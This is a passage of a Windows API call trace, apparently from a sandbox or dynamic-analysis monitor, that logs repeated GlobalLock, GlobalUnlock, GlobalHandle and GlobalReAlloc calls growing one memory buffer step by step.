[0097.259] GlobalUnlock (hMem=0x83000c) returned 0
[0097.259] GlobalReAlloc (hMem=0x83000c, dwBytes=0x46000, uFlags=0x2) returned 0x83000c
[0097.259] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.260] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.260] GlobalUnlock (hMem=0x83000c) returned 0
[0097.260] GlobalReAlloc (hMem=0x83000c, dwBytes=0x48000, uFlags=0x2) returned 0x83000c
[0097.260] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.261] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.261] GlobalUnlock (hMem=0x83000c) returned 0
[0097.261] GlobalReAlloc (hMem=0x83000c, dwBytes=0x4a000, uFlags=0x2) returned 0x83000c
[0097.261] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.262] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.262] GlobalUnlock (hMem=0x83000c) returned 0
[0097.262] GlobalReAlloc (hMem=0x83000c, dwBytes=0x4c000, uFlags=0x2) returned 0x83000c
[0097.262] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.262] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.262] GlobalUnlock (hMem=0x83000c) returned 0
[0097.262] GlobalReAlloc (hMem=0x83000c, dwBytes=0x4e000, uFlags=0x2) returned 0x83000c
[0097.262] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.263] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.263] GlobalUnlock (hMem=0x83000c) returned 0
[0097.263] GlobalReAlloc (hMem=0x83000c, dwBytes=0x50000, uFlags=0x2) returned 0x83000c
[0097.263] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.264] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.264] GlobalUnlock (hMem=0x83000c) returned 0
[0097.264] GlobalReAlloc (hMem=0x83000c, dwBytes=0x52000, uFlags=0x2) returned 0x83000c
[0097.264] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.265] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.265] GlobalUnlock (hMem=0x83000c) returned 0
[0097.265] GlobalReAlloc (hMem=0x83000c, dwBytes=0x54000, uFlags=0x2) returned 0x83000c
[0097.265] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.265] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.265] GlobalUnlock (hMem=0x83000c) returned 0
[0097.265] GlobalReAlloc (hMem=0x83000c, dwBytes=0x56000, uFlags=0x2) returned 0x83000c
[0097.265] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.266] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.266] GlobalUnlock (hMem=0x83000c) returned 0
[0097.266] GlobalReAlloc (hMem=0x83000c, dwBytes=0x58000, uFlags=0x2) returned 0x83000c
[0097.266] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.267] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.267] GlobalUnlock (hMem=0x83000c) returned 0
[0097.267] GlobalReAlloc (hMem=0x83000c, dwBytes=0x5a000, uFlags=0x2) returned 0x83000c
[0097.267] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.268] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.268] GlobalUnlock (hMem=0x83000c) returned 0
[0097.268] GlobalReAlloc (hMem=0x83000c, dwBytes=0x5c000, uFlags=0x2) returned 0x83000c
[0097.268] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.268] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.268] GlobalUnlock (hMem=0x83000c) returned 0
[0097.268] GlobalReAlloc (hMem=0x83000c, dwBytes=0x5e000, uFlags=0x2) returned 0x83000c
[0097.268] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.269] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.269] GlobalUnlock (hMem=0x83000c) returned 0
[0097.269] GlobalReAlloc (hMem=0x83000c, dwBytes=0x60000, uFlags=0x2) returned 0x83000c
[0097.269] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.270] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.270] GlobalUnlock (hMem=0x83000c) returned 0
[0097.270] GlobalReAlloc (hMem=0x83000c, dwBytes=0x62000, uFlags=0x2) returned 0x83000c
[0097.270] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.271] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.271] GlobalUnlock (hMem=0x83000c) returned 0
[0097.271] GlobalReAlloc (hMem=0x83000c, dwBytes=0x64000, uFlags=0x2) returned 0x83000c
[0097.271] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.271] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.271] GlobalUnlock (hMem=0x83000c) returned 0
[0097.271] GlobalReAlloc (hMem=0x83000c, dwBytes=0x66000, uFlags=0x2) returned 0x83000c
[0097.271] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.272] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.272] GlobalUnlock (hMem=0x83000c) returned 0
[0097.272] GlobalReAlloc (hMem=0x83000c, dwBytes=0x68000, uFlags=0x2) returned 0x83000c
[0097.272] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.273] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.273] GlobalUnlock (hMem=0x83000c) returned 0
[0097.273] GlobalReAlloc (hMem=0x83000c, dwBytes=0x6a000, uFlags=0x2) returned 0x83000c
[0097.273] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.273] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.273] GlobalUnlock (hMem=0x83000c) returned 0
[0097.273] GlobalReAlloc (hMem=0x83000c, dwBytes=0x6c000, uFlags=0x2) returned 0x83000c
[0097.279] GlobalLock (hMem=0x83000c) returned 0x650820
[0097.280] GlobalHandle (pMem=0x650820) returned 0x83000c
[0097.280] GlobalUnlock (hMem=0x83000c) returned 0
[0097.280] GlobalReAlloc (hMem=0x83000c, dwBytes=0x6e000, uFlags=0x2) returned 0x83000c
[0097.280] GlobalLock (hMem=0x83000c) returned 0x650820
[0097.280] GlobalHandle (pMem=0x650820) returned 0x83000c
[0097.280] GlobalUnlock (hMem=0x83000c) returned 0
[0097.280] GlobalReAlloc (hMem=0x83000c, dwBytes=0x70000, uFlags=0x2) returned 0x83000c
[0097.293] GlobalLock (hMem=0x83000c) returned 0x24c0048
[0097.294] GlobalHandle (pMem=0x24c0048) returned 0x83000c
[0097.294] GlobalUnlock (hMem=0x83000c) returned 0
[0097.294] GlobalReAlloc (hMem=0x83000c, dwBytes=0x72000, uFlags=0x2) returned 0x83000c
[0097.300] GlobalLock (hMem=0x83000c) returned 0x2530058
[0097.301] GlobalHandle (pMem=0x2530058) returned 0x83000c
[0097.301] GlobalUnlock (hMem=0x83000c) returned 0
[0097.301] GlobalReAlloc (hMem=0x83000c, dwBytes=0x74000, uFlags=0x2) returned 0x83000c
[0097.301] GlobalLock (hMem=0x83000c) returned 0x2530058
[0097.302] GlobalHandle (pMem=0x2530058) returned 0x83000c
[0097.302] GlobalUnlock (hMem=0x83000c) returned 0
[0097.302] GlobalReAlloc (hMem=0x83000c, dwBytes=0x76000, uFlags=0x2) returned 0x83000c
[0097.363] GlobalLock (hMem=0x83000c) returned 0x5e6810
[0097.363] GlobalHandle (pMem=0x5e6810) returned 0x83000c
[0097.363] GlobalUnlock (hMem=0x83000c) returned 0
[0097.363] GlobalReAlloc (hMem=0x83000c, dwBytes=0x78000, uFlags=0x2) returned 0x83000c
[0097.369] GlobalLock (hMem=0x83000c) returned 0x24c0048
[0097.370] GlobalHandle (pMem=0x24c0048) returned 0x83000c
[0097.370] GlobalUnlock (hMem=0x83000c) returned 0
[0097.370] GlobalReAlloc (hMem=0x83000c, dwBytes=0x7a000, uFlags=0x2) returned 0x83000c
[0097.377] GlobalLock (hMem=0x83000c) returned 0x2538058
[0097.378] GlobalHandle (pMem=0x2538058) returned 0x83000c
[0097.378] GlobalUnlock (hMem=0x83000c) returned 0
[0097.378] GlobalReAlloc (hMem=0x83000c, dwBytes=0x7c000, uFlags=0x2) returned 0x83000c
[0097.378] GlobalLock (hMem=0x83000c) returned 0x2538058
[0097.379] GlobalHandle (pMem=0x2538058) returned 0x83000c
[0097.379] GlobalUnlock (hMem=0x83000c) returned 0
[0097.379] GlobalReAlloc (hMem=0x83000c, dwBytes=0x7e000, uFlags=0x2) returned 0x83000c
[0097.397] GlobalLock (hMem=0x83000c) returned 0x25c0048
[0097.397] GlobalHandle (pMem=0x25c0048) returned 0x83000c
[0097.397] GlobalUnlock (hMem=0x83000c) returned 0
[0097.397] GlobalReAlloc (hMem=0x83000c, dwBytes=0x80000, uFlags=0x2) returned 0x83000c
[0097.462] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.463] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.463] GlobalUnlock (hMem=0x83000c) returned 0
[0097.463] GlobalReAlloc (hMem=0x83000c, dwBytes=0x82000, uFlags=0x2) returned 0x83000c
[0097.473] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.474] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.474] GlobalUnlock (hMem=0x83000c) returned 0
[0097.474] GlobalReAlloc (hMem=0x83000c, dwBytes=0x84000, uFlags=0x2) returned 0x83000c
[0097.485] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.486] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.486] GlobalUnlock (hMem=0x83000c) returned 0
[0097.486] GlobalReAlloc (hMem=0x83000c, dwBytes=0x86000, uFlags=0x2) returned 0x83000c
[0097.544] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.544] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.544] GlobalUnlock (hMem=0x83000c) returned 0
[0097.544] GlobalReAlloc (hMem=0x83000c, dwBytes=0x88000, uFlags=0x2) returned 0x83000c
[0097.555] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.556] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.556] GlobalUnlock (hMem=0x83000c) returned 0
[0097.556] GlobalReAlloc (hMem=0x83000c, dwBytes=0x8a000, uFlags=0x2) returned 0x83000c
[0097.568] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.569] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.569] GlobalUnlock (hMem=0x83000c) returned 0
[0097.569] GlobalReAlloc (hMem=0x83000c, dwBytes=0x8c000, uFlags=0x2) returned 0x83000c
[0097.580] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.581] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.581] GlobalUnlock (hMem=0x83000c) returned 0
[0097.581] GlobalReAlloc (hMem=0x83000c, dwBytes=0x8e000, uFlags=0x2) returned 0x83000c
[0097.640] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.641] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.641] GlobalUnlock (hMem=0x83000c) returned 0
[0097.641] GlobalReAlloc (hMem=0x83000c, dwBytes=0x90000, uFlags=0x2) returned 0x83000c
[0097.653] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.654] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.654] GlobalUnlock (hMem=0x83000c) returned 0
[0097.654] GlobalReAlloc (hMem=0x83000c, dwBytes=0x92000, uFlags=0x2) returned 0x83000c
[0097.668] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.669] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.669] GlobalUnlock (hMem=0x83000c) returned 0
[0097.669] GlobalReAlloc (hMem=0x83000c, dwBytes=0x94000, uFlags=0x2) returned 0x83000c
[0097.727] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.728] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.728] GlobalUnlock (hMem=0x83000c) returned 0
[0097.728] GlobalReAlloc (hMem=0x83000c, dwBytes=0x96000, uFlags=0x2) returned 0x83000c
[0097.741] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.742] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.742] GlobalUnlock (hMem=0x83000c) returned 0
[0097.742] GlobalReAlloc (hMem=0x83000c, dwBytes=0x98000, uFlags=0x2) returned 0x83000c
[0097.755] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.756] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.756] GlobalUnlock (hMem=0x83000c) returned 0
[0097.756] GlobalReAlloc (hMem=0x83000c, dwBytes=0x9a000, uFlags=0x2) returned 0x83000c
[0097.770] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.771] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.771] GlobalUnlock (hMem=0x83000c) returned 0
[0097.771] GlobalReAlloc (hMem=0x83000c, dwBytes=0x9c000, uFlags=0x2) returned 0x83000c
[0097.831] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.832] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.832] GlobalUnlock (hMem=0x83000c) returned 0
[0097.832] GlobalReAlloc (hMem=0x83000c, dwBytes=0x9e000, uFlags=0x2) returned 0x83000c
[0097.845] GlobalLock (hMem=0x83000c) returned 0xdd0020
[0097.846] GlobalHandle (pMem=0xdd0020) returned 0x83000c
[0097.846] GlobalUnlock (hMem=0x83000c) returned 0
[0097.846] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa0000, uFlags=0x2) returned 0x83000c
[0097.860] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.861] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.861] GlobalUnlock (hMem=0x83000c) returned 0
[0097.861] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa2000, uFlags=0x2) returned 0x83000c
[0097.923] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0097.923] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0097.923] GlobalUnlock (hMem=0x83000c) returned 0
[0097.923] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa4000, uFlags=0x2) returned 0x83000c
[0097.937] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0097.938] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0097.938] GlobalUnlock (hMem=0x83000c) returned 0
[0097.938] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa6000, uFlags=0x2) returned 0x83000c
[0097.951] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0097.952] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0097.952] GlobalUnlock (hMem=0x83000c) returned 0
[0097.952] GlobalReAlloc (hMem=0x83000c, dwBytes=0xa8000, uFlags=0x2) returned 0x83000c
[0098.028] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.029] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.029] GlobalUnlock (hMem=0x83000c) returned 0
[0098.029] GlobalReAlloc (hMem=0x83000c, dwBytes=0xaa000, uFlags=0x2) returned 0x83000c
[0098.043] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.044] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.044] GlobalUnlock (hMem=0x83000c) returned 0
[0098.044] GlobalReAlloc (hMem=0x83000c, dwBytes=0xac000, uFlags=0x2) returned 0x83000c
[0098.059] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.060] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.060] GlobalUnlock (hMem=0x83000c) returned 0
[0098.060] GlobalReAlloc (hMem=0x83000c, dwBytes=0xae000, uFlags=0x2) returned 0x83000c
[0098.122] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.123] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.123] GlobalUnlock (hMem=0x83000c) returned 0
[0098.123] GlobalReAlloc (hMem=0x83000c, dwBytes=0xb0000, uFlags=0x2) returned 0x83000c
[0098.138] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.139] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.139] GlobalUnlock (hMem=0x83000c) returned 0
[0098.139] GlobalReAlloc (hMem=0x83000c, dwBytes=0xb2000, uFlags=0x2) returned 0x83000c
[0098.154] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.154] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.155] GlobalUnlock (hMem=0x83000c) returned 0
[0098.155] GlobalReAlloc (hMem=0x83000c, dwBytes=0xb4000, uFlags=0x2) returned 0x83000c
[0098.216] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.217] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.217] GlobalUnlock (hMem=0x83000c) returned 0
[0098.217] GlobalReAlloc (hMem=0x83000c, dwBytes=0xb6000, uFlags=0x2) returned 0x83000c
[0098.232] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.233] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.233] GlobalUnlock (hMem=0x83000c) returned 0
[0098.233] GlobalReAlloc (hMem=0x83000c, dwBytes=0xb8000, uFlags=0x2) returned 0x83000c
[0098.249] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.250] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.250] GlobalUnlock (hMem=0x83000c) returned 0
[0098.250] GlobalReAlloc (hMem=0x83000c, dwBytes=0xba000, uFlags=0x2) returned 0x83000c
[0098.314] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.315] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.315] GlobalUnlock (hMem=0x83000c) returned 0
[0098.315] GlobalReAlloc (hMem=0x83000c, dwBytes=0xbc000, uFlags=0x2) returned 0x83000c
[0098.332] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.332] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.333] GlobalUnlock (hMem=0x83000c) returned 0
[0098.333] GlobalReAlloc (hMem=0x83000c, dwBytes=0xbe000, uFlags=0x2) returned 0x83000c
[0098.350] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.398] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.398] GlobalUnlock (hMem=0x83000c) returned 0
[0098.398] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc0000, uFlags=0x2) returned 0x83000c
[0098.418] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.419] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.419] GlobalUnlock (hMem=0x83000c) returned 0
[0098.419] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc2000, uFlags=0x2) returned 0x83000c
[0098.436] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.437] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.437] GlobalUnlock (hMem=0x83000c) returned 0
[0098.437] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc4000, uFlags=0x2) returned 0x83000c
[0098.501] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.502] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.502] GlobalUnlock (hMem=0x83000c) returned 0
[0098.502] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc6000, uFlags=0x2) returned 0x83000c
[0098.520] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.520] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.520] GlobalUnlock (hMem=0x83000c) returned 0
[0098.520] GlobalReAlloc (hMem=0x83000c, dwBytes=0xc8000, uFlags=0x2) returned 0x83000c
[0098.586] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.587] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.587] GlobalUnlock (hMem=0x83000c) returned 0
[0098.587] GlobalReAlloc (hMem=0x83000c, dwBytes=0xca000, uFlags=0x2) returned 0x83000c
[0098.605] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.606] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.606] GlobalUnlock (hMem=0x83000c) returned 0
[0098.606] GlobalReAlloc (hMem=0x83000c, dwBytes=0xcc000, uFlags=0x2) returned 0x83000c
[0098.669] GlobalLock (hMem=0x83000c) returned 0x8c0020
[0098.670] GlobalHandle (pMem=0x8c0020) returned 0x83000c
[0098.670] GlobalUnlock (hMem=0x83000c) returned 0
[0098.670] GlobalReAlloc (hMem=0x83000c, dwBytes=0xce000, uFlags=0x2) returned 0x83000c
[0098.688] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.689] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.689] GlobalUnlock (hMem=0x83000c) returned 0
[0098.689] GlobalReAlloc (hMem=0x83000c, dwBytes=0xd0000, uFlags=0x2) returned 0x83000c
[0098.706] GlobalLock (hMem=0x83000c) returned 0x2890020
[0098.707] GlobalHandle (pMem=0x2890020) returned 0x83000c
[0098.707] GlobalUnlock (hMem=0x83000c) returned 0
[0098.707] GlobalReAlloc (hMem=0x83000c, dwBytes=0xd2000, uFlags=0x2) returned 0x83000c
[0098.770] GlobalLock (hMem=0x83000c) returned 0x2970020
[0098.771] GlobalHandle (pMem=0x2970020) returned 0x83000c
[0098.771] GlobalUnlock (hMem=0x83000c) returned 0
[0098.771] GlobalReAlloc (hMem=0x83000c, dwBytes=0xd4000, uFlags=0x2) returned 0x83000c
[0098.789] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.790] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.790] GlobalUnlock (hMem=0x83000c) returned 0
[0098.790] GlobalReAlloc (hMem=0x83000c, dwBytes=0xd6000, uFlags=0x2) returned 0x83000c
[0098.880] GlobalLock (hMem=0x83000c) returned 0x28a0020
[0098.881] GlobalHandle (pMem=0x28a0020) returned 0x83000c
[0098.881] GlobalUnlock (hMem=0x83000c) returned 0
[0098.881] GlobalReAlloc (hMem=0x83000c, dwBytes=0xd8000, uFlags=0x2) returned 0x83000c
[0098.901] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.902] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.902] GlobalUnlock (hMem=0x83000c) returned 0
[0098.902] GlobalReAlloc (hMem=0x83000c, dwBytes=0xda000, uFlags=0x2) returned 0x83000c
[0098.956] GlobalLock (hMem=0x83000c) returned 0x28a0020
[0098.957] GlobalHandle (pMem=0x28a0020) returned 0x83000c
[0098.957] GlobalUnlock (hMem=0x83000c) returned 0
[0098.957] GlobalReAlloc (hMem=0x83000c, dwBytes=0xdc000, uFlags=0x2) returned 0x83000c
[0098.981] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0098.982] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0098.982] GlobalUnlock (hMem=0x83000c) returned 0
[0098.982] GlobalReAlloc (hMem=0x83000c, dwBytes=0xde000, uFlags=0x2) returned 0x83000c
[0099.048] GlobalLock (hMem=0x83000c) returned 0x28a0020
[0099.049] GlobalHandle (pMem=0x28a0020) returned 0x83000c
[0099.049] GlobalUnlock (hMem=0x83000c) returned 0
[0099.049] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe0000, uFlags=0x2) returned 0x83000c
[0099.067] GlobalLock (hMem=0x83000c) returned 0x2980020
[0099.067] GlobalHandle (pMem=0x2980020) returned 0x83000c
[0099.067] GlobalUnlock (hMem=0x83000c) returned 0
[0099.067] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe2000, uFlags=0x2) returned 0x83000c
[0099.143] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.144] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.144] GlobalUnlock (hMem=0x83000c) returned 0
[0099.144] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe4000, uFlags=0x2) returned 0x83000c
[0099.167] GlobalLock (hMem=0x83000c) returned 0x28b0020
[0099.168] GlobalHandle (pMem=0x28b0020) returned 0x83000c
[0099.168] GlobalUnlock (hMem=0x83000c) returned 0
[0099.168] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe6000, uFlags=0x2) returned 0x83000c
[0099.236] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.237] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.237] GlobalUnlock (hMem=0x83000c) returned 0
[0099.237] GlobalReAlloc (hMem=0x83000c, dwBytes=0xe8000, uFlags=0x2) returned 0x83000c
[0099.257] GlobalLock (hMem=0x83000c) returned 0x28b0020
[0099.258] GlobalHandle (pMem=0x28b0020) returned 0x83000c
[0099.258] GlobalUnlock (hMem=0x83000c) returned 0
[0099.258] GlobalReAlloc (hMem=0x83000c, dwBytes=0xea000, uFlags=0x2) returned 0x83000c
[0099.327] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.328] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.328] GlobalUnlock (hMem=0x83000c) returned 0
[0099.328] GlobalReAlloc (hMem=0x83000c, dwBytes=0xec000, uFlags=0x2) returned 0x83000c
[0099.347] GlobalLock (hMem=0x83000c) returned 0x28b0020
[0099.348] GlobalHandle (pMem=0x28b0020) returned 0x83000c
[0099.348] GlobalUnlock (hMem=0x83000c) returned 0
[0099.348] GlobalReAlloc (hMem=0x83000c, dwBytes=0xee000, uFlags=0x2) returned 0x83000c
[0099.415] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.416] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.416] GlobalUnlock (hMem=0x83000c) returned 0
[0099.416] GlobalReAlloc (hMem=0x83000c, dwBytes=0xf0000, uFlags=0x2) returned 0x83000c
[0099.437] GlobalLock (hMem=0x83000c) returned 0x28b0020
[0099.437] GlobalHandle (pMem=0x28b0020) returned 0x83000c
[0099.438] GlobalUnlock (hMem=0x83000c) returned 0
[0099.438] GlobalReAlloc (hMem=0x83000c, dwBytes=0xf2000, uFlags=0x2) returned 0x83000c
[0099.458] GlobalLock (hMem=0x83000c) returned 0x29b0020
[0099.507] GlobalHandle (pMem=0x29b0020) returned 0x83000c
[0099.507] GlobalUnlock (hMem=0x83000c) returned 0
[0099.507] GlobalReAlloc (hMem=0x83000c, dwBytes=0xf4000, uFlags=0x2) returned 0x83000c
[0099.527] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.528] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.528] GlobalUnlock (hMem=0x83000c) returned 0
[0099.528] GlobalReAlloc (hMem=0x83000c, dwBytes=0xf6000, uFlags=0x2) returned 0x83000c
[0099.549] GlobalLock (hMem=0x83000c) returned 0x28c0020
[0099.550] GlobalHandle (pMem=0x28c0020) returned 0x83000c
[0099.550] GlobalUnlock (hMem=0x83000c) returned 0
[0099.550] GlobalReAlloc (hMem=0x83000c, dwBytes=0xf8000, uFlags=0x2) returned 0x83000c
[0099.621] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.622] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.622] GlobalUnlock (hMem=0x83000c) returned 0
[0099.622] GlobalReAlloc (hMem=0x83000c, dwBytes=0xfa000, uFlags=0x2) returned 0x83000c
[0099.695] GlobalLock (hMem=0x83000c) returned 0x28c0020
[0099.696] GlobalHandle (pMem=0x28c0020) returned 0x83000c
[0099.696] GlobalUnlock (hMem=0x83000c) returned 0
[0099.696] GlobalReAlloc (hMem=0x83000c, dwBytes=0xfc000, uFlags=0x2) returned 0x83000c
[0099.718] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.719] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.719] GlobalUnlock (hMem=0x83000c) returned 0
[0099.719] GlobalReAlloc (hMem=0x83000c, dwBytes=0xfe000, uFlags=0x2) returned 0x83000c
[0099.789] GlobalLock (hMem=0x83000c) returned 0x28c0020
[0099.790] GlobalHandle (pMem=0x28c0020) returned 0x83000c
[0099.790] GlobalUnlock (hMem=0x83000c) returned 0
[0099.790] GlobalReAlloc (hMem=0x83000c, dwBytes=0x100000, uFlags=0x2) returned 0x83000c
[0099.816] GlobalLock (hMem=0x83000c) returned 0x29c0020
[0099.817] GlobalHandle (pMem=0x29c0020) returned 0x83000c
[0099.817] GlobalUnlock (hMem=0x83000c) returned 0
[0099.817] GlobalReAlloc (hMem=0x83000c, dwBytes=0x102000, uFlags=0x2) returned 0x83000c
[0099.891] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.892] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.892] GlobalUnlock (hMem=0x83000c) returned 0
[0099.892] GlobalReAlloc (hMem=0x83000c, dwBytes=0x104000, uFlags=0x2) returned 0x83000c
[0099.964] GlobalLock (hMem=0x83000c) returned 0x28d0020
[0099.965] GlobalHandle (pMem=0x28d0020) returned 0x83000c
[0099.965] GlobalUnlock (hMem=0x83000c) returned 0
[0099.965] GlobalReAlloc (hMem=0x83000c, dwBytes=0x106000, uFlags=0x2) returned 0x83000c
[0099.988] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0099.989] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0099.989] GlobalUnlock (hMem=0x83000c) returned 0
[0099.989] GlobalReAlloc (hMem=0x83000c, dwBytes=0x108000, uFlags=0x2) returned 0x83000c
[0100.068] GlobalLock (hMem=0x83000c) returned 0x28d0020
[0100.069] GlobalHandle (pMem=0x28d0020) returned 0x83000c
[0100.069] GlobalUnlock (hMem=0x83000c) returned 0
